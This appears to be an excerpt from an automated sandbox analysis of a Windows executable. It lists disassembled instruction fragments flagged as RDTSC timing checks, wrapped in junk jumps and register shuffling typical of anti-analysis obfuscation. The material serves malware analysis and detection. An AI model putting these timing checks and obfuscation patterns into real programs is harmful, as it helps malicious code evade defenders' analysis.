                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B016C second address: 49B01F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05ECE231C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F05ECE231C1h 0x0000000f xchg eax, ebx 0x00000010 pushad 0x00000011 jmp 00007F05ECE231BCh 0x00000016 pushfd 0x00000017 jmp 00007F05ECE231C2h 0x0000001c adc ax, AE98h 0x00000021 jmp 00007F05ECE231BBh 0x00000026 popfd 0x00000027 popad 0x00000028 mov ebx, dword ptr [ebp+10h] 0x0000002b jmp 00007F05ECE231C6h 0x00000030 xchg eax, esi 0x00000031 jmp 00007F05ECE231C0h 0x00000036 push eax 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B01F7 second address: 49B01FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B01FB second address: 49B0201 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B0201 second address: 49B023A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05ECFAD30Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a pushad 0x0000000b mov cl, 9Eh 0x0000000d call 00007F05ECFAD311h 0x00000012 mov ebx, esi 0x00000014 pop ecx 0x00000015 popad 0x00000016 mov esi, dword ptr [ebp+08h] 0x00000019 pushad 0x0000001a mov bx, 94FCh 0x0000001e push eax 0x0000001f push edx 0x00000020 movsx edx, ax 0x00000023 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B023A second address: 49B0275 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F05ECE231BCh 0x00000008 sub ax, 7818h 0x0000000d jmp 00007F05ECE231BBh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 xchg eax, edi 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F05ECE231C5h 0x0000001e rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B0275 second address: 49B02CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, si 0x00000006 pushfd 0x00000007 jmp 00007F05ECFAD318h 0x0000000c and ah, FFFFFFD8h 0x0000000f jmp 00007F05ECFAD30Bh 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c call 00007F05ECFAD312h 0x00000021 pop esi 0x00000022 call 00007F05ECFAD30Bh 0x00000027 pop eax 0x00000028 popad 0x00000029 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B02CA second address: 49B02DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, 341BAD8Bh 0x00000008 mov edi, ecx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, edi 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B02DE second address: 49B02E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B02E2 second address: 49B02E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B02E8 second address: 49B02F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F05ECFAD30Dh 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B02F9 second address: 49B032D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test esi, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F05ECE231C6h 0x00000013 xor cl, 00000028h 0x00000016 jmp 00007F05ECE231BBh 0x0000001b popfd 0x0000001c popad 0x0000001d rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B032D second address: 49B037E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05ECFAD314h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F065F51B5D6h 0x0000000f jmp 00007F05ECFAD310h 0x00000014 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000001b jmp 00007F05ECFAD310h 0x00000020 je 00007F065F51B5BFh 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b popad 0x0000002c rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B037E second address: 49B039B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05ECE231C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B039B second address: 49B03AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F05ECFAD30Ch 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A0851 second address: 49A0861 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F05ECE231BCh 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A0861 second address: 49A088A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05ECFAD30Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F05ECFAD315h 0x00000013 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A088A second address: 49A08DB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F05ECE231BAh 0x00000009 adc ah, FFFFFFB8h 0x0000000c jmp 00007F05ECE231BBh 0x00000011 popfd 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 pushfd 0x0000001a jmp 00007F05ECE231C5h 0x0000001f add ax, 5156h 0x00000024 jmp 00007F05ECE231C1h 0x00000029 popfd 0x0000002a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A08DB second address: 49A08E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A08E3 second address: 49A08E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A08E7 second address: 49A090D instructions: 0x00000000 rdtsc 0x00000002 mov ecx, edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, esi 0x00000008 jmp 00007F05ECFAD315h 0x0000000d mov esi, dword ptr [ebp+08h] 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A090D second address: 49A0911 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A0911 second address: 49A0924 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05ECFAD30Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A0924 second address: 49A0960 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05ECE231C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub ebx, ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F05ECE231C9h 0x00000014 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A0960 second address: 49A0964 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A0964 second address: 49A096A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A096A second address: 49A0970 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A0970 second address: 49A0980 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test esi, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A0980 second address: 49A0984 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A0984 second address: 49A0988 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A0988 second address: 49A098E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A098E second address: 49A09A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F05ECE231C5h 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A09A7 second address: 49A09D3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05ECFAD311h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007F065F522CD6h 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F05ECFAD30Dh 0x00000018 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A09D3 second address: 49A09D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A09D8 second address: 49A0AA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov eax, ebx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000010 jmp 00007F05ECFAD30Fh 0x00000015 mov ecx, esi 0x00000017 jmp 00007F05ECFAD316h 0x0000001c je 00007F065F522C9Ah 0x00000022 jmp 00007F05ECFAD310h 0x00000027 test byte ptr [76FA6968h], 00000002h 0x0000002e pushad 0x0000002f pushad 0x00000030 push ecx 0x00000031 pop ebx 0x00000032 mov ch, 22h 0x00000034 popad 0x00000035 movsx edi, cx 0x00000038 popad 0x00000039 jne 00007F065F522C85h 0x0000003f jmp 00007F05ECFAD30Ch 0x00000044 mov edx, dword ptr [ebp+0Ch] 0x00000047 jmp 00007F05ECFAD310h 0x0000004c xchg eax, ebx 0x0000004d push eax 0x0000004e push edx 0x0000004f pushad 0x00000050 pushfd 0x00000051 jmp 00007F05ECFAD30Dh 0x00000056 xor eax, 5F10E9C6h 0x0000005c jmp 00007F05ECFAD311h 0x00000061 popfd 0x00000062 pushfd 0x00000063 jmp 00007F05ECFAD310h 0x00000068 xor cl, 00000068h 0x0000006b jmp 00007F05ECFAD30Bh 0x00000070 popfd 0x00000071 popad 0x00000072 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A0AA7 second address: 49A0ABF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F05ECE231C4h 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A0ABF second address: 49A0AD7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F05ECFAD30Dh 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A0AD7 second address: 49A0B26 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, 7Ch 0x00000005 pushfd 0x00000006 jmp 00007F05ECE231C8h 0x0000000b sub si, FA58h 0x00000010 jmp 00007F05ECE231BBh 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 xchg eax, ebx 0x0000001a jmp 00007F05ECE231C6h 0x0000001f xchg eax, ebx 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A0B26 second address: 49A0B2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov esi, edi 0x00000006 popad 0x00000007 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A0B2D second address: 49A0B3E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ch, 72h 0x00000005 mov al, bh 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A0B3E second address: 49A0B42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A0B42 second address: 49A0B48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A0C26 second address: 49A0C2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov dh, 6Bh 0x00000006 popad 0x00000007 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B0F02 second address: 49B0F11 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05ECE231BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B0ADB second address: 49B0B1E instructions: 0x00000000 rdtsc 0x00000002 movzx ecx, bx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushfd 0x00000008 jmp 00007F05ECFAD315h 0x0000000d xor al, 00000006h 0x00000010 jmp 00007F05ECFAD311h 0x00000015 popfd 0x00000016 popad 0x00000017 xchg eax, ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F05ECFAD30Dh 0x0000001f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B0B1E second address: 49B0B42 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05ECE231C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F05ECE231BCh 0x00000011 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B0B42 second address: 49B0B90 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F05ECFAD311h 0x00000008 pushfd 0x00000009 jmp 00007F05ECFAD310h 0x0000000e sub cx, 3368h 0x00000013 jmp 00007F05ECFAD30Bh 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c xchg eax, ebp 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F05ECFAD310h 0x00000026 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B0B90 second address: 49B0B94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B0B94 second address: 49B0B9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B0B9A second address: 49B0BA0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B0BA0 second address: 49B0BA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B0BA4 second address: 49B0BA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A30643 second address: 4A30696 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05ECFAD30Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F05ECFAD316h 0x0000000f push eax 0x00000010 jmp 00007F05ECFAD30Bh 0x00000015 xchg eax, ebp 0x00000016 pushad 0x00000017 mov bx, cx 0x0000001a jmp 00007F05ECFAD310h 0x0000001f popad 0x00000020 mov ebp, esp 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 movsx edi, cx 0x00000028 mov al, 62h 0x0000002a popad 0x0000002b rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A30696 second address: 4A306B1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05ECE231C0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A306B1 second address: 4A306B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A306B5 second address: 4A306B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A306B9 second address: 4A306BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A306BF second address: 4A306C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A306C5 second address: 4A306C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A306C9 second address: 4A306CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A2085D second address: 4A20874 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F05ECFAD30Eh 0x0000000e rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A20874 second address: 4A208B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, edx 0x00000005 mov edi, 20F7FCF0h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e jmp 00007F05ECE231BFh 0x00000013 mov ebp, esp 0x00000015 jmp 00007F05ECE231C6h 0x0000001a pop ebp 0x0000001b pushad 0x0000001c movzx ecx, dx 0x0000001f push eax 0x00000020 push edx 0x00000021 mov bh, 34h 0x00000023 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0253 second address: 49C0259 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0259 second address: 49C025D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C025D second address: 49C0274 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F05ECFAD30Ch 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0274 second address: 49C027A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C027A second address: 49C027E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C027E second address: 49C02B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F05ECE231C9h 0x0000000e mov ebp, esp 0x00000010 jmp 00007F05ECE231BEh 0x00000015 pop ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C02B7 second address: 49C02BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C02BD second address: 49C02CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F05ECE231BBh 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C02CC second address: 49C02D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A20B60 second address: 4A20BCC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05ECE231C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F05ECE231C1h 0x0000000f xchg eax, ebp 0x00000010 jmp 00007F05ECE231BEh 0x00000015 mov ebp, esp 0x00000017 jmp 00007F05ECE231C0h 0x0000001c push dword ptr [ebp+0Ch] 0x0000001f jmp 00007F05ECE231C0h 0x00000024 push dword ptr [ebp+08h] 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007F05ECE231BAh 0x00000030 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A20BCC second address: 4A20BDB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05ECFAD30Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A20BDB second address: 4A20C10 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05ECE231C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 call 00007F05ECE231B9h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F05ECE231BDh 0x00000015 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A20C10 second address: 4A20C79 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05ECFAD311h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov eax, edx 0x0000000d pushfd 0x0000000e jmp 00007F05ECFAD313h 0x00000013 and eax, 0435EE0Eh 0x00000019 jmp 00007F05ECFAD319h 0x0000001e popfd 0x0000001f popad 0x00000020 mov eax, dword ptr [esp+04h] 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F05ECFAD313h 0x0000002d rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A20C79 second address: 4A20C7F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A20C7F second address: 4A20CB7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05ECFAD314h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b jmp 00007F05ECFAD30Bh 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F05ECFAD30Bh 0x0000001d rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A20CB7 second address: 4A20CBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A20CBB second address: 4A20CC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A20CC1 second address: 4A20CC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A20CC7 second address: 4A20CCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A20CCB second address: 4A20CE6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05ECE231BEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A20CE6 second address: 4A20CEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A20CEA second address: 4A20CEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A20CEE second address: 4A20CF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
